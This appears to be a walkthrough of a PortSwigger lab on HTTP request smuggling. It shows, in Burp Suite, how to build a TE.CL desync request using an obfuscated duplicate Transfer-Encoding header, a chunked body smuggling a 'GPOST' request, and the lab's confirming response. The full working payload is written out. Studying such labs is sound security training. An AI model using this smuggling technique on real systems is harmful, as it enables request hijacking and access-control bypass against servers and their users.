Lab: HTTP request smuggling, obfuscating the TE header

After starting the exercise, the blog should look similar to the one shown in the following illustration.

Most of this exercise will be carried out using Burp Suite. We will now switch to Burp Suite and open Burp Proxy. In Burp Proxy, we will open the HTTP history tab and search for the first request that calls up the blog.

We send this request to the Burp Repeater using the key combination CTRL + R. The request can also be sent to the repeater via the context menu. Right-click on the request -> select Send to Repeater. We then switch to the Burp Repeater. In some cases, HTTP/2 may be used. In this rare case, you must switch to HTTP/1.1 via the Inspector.

The request in Burp Repeater should now look similar to the following request.

GET / HTTP/1.1
Host: 0a5500b703c9888c8118cf8200440002.web-security-academy.net
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Referer: https://portswigger.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

The next step is to disable the Update Content-Length function in the Burp Repeater menu. Then, we change the request method from GET to POST. To do this, we right-click and select Change request method. This inserts the header Content-Length: 0 at the end of our request. We change the value of the Content-Length header to 4, as this request should only be 4 bytes long; the payload is in the attached request. We now add two Transfer-Encoding: headers to the end of the request. The value of the first Transfer-Encoding header is chunked. This is the regular Transfer-Encoding header, while the second Transfer-Encoding header contains the value cow and is the header that can only be read by the backend server. Now we need to adjust the body of the request. This body is the same as in the previous exercise and can be copied from there.

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

5c bytes (92 in decimal) is the total length of the request, including the two line breaks after the 0 in hexadecimal. 5c itself is not counted. The complete request should now look like this:

The complete request:

POST / HTTP/1.1
Host: 0a5500b703c9888c8118cf8200440002.web-security-academy.net
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Referer: https://portswigger.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
Transfer-Encoding: cow

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

We now send this request twice to the application and should then receive the following response.

HTTP/1.1 403 Forbidden
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 27

"Unrecognized method GPOST"

When this response appears, the exercise has been successfully completed.

Video solution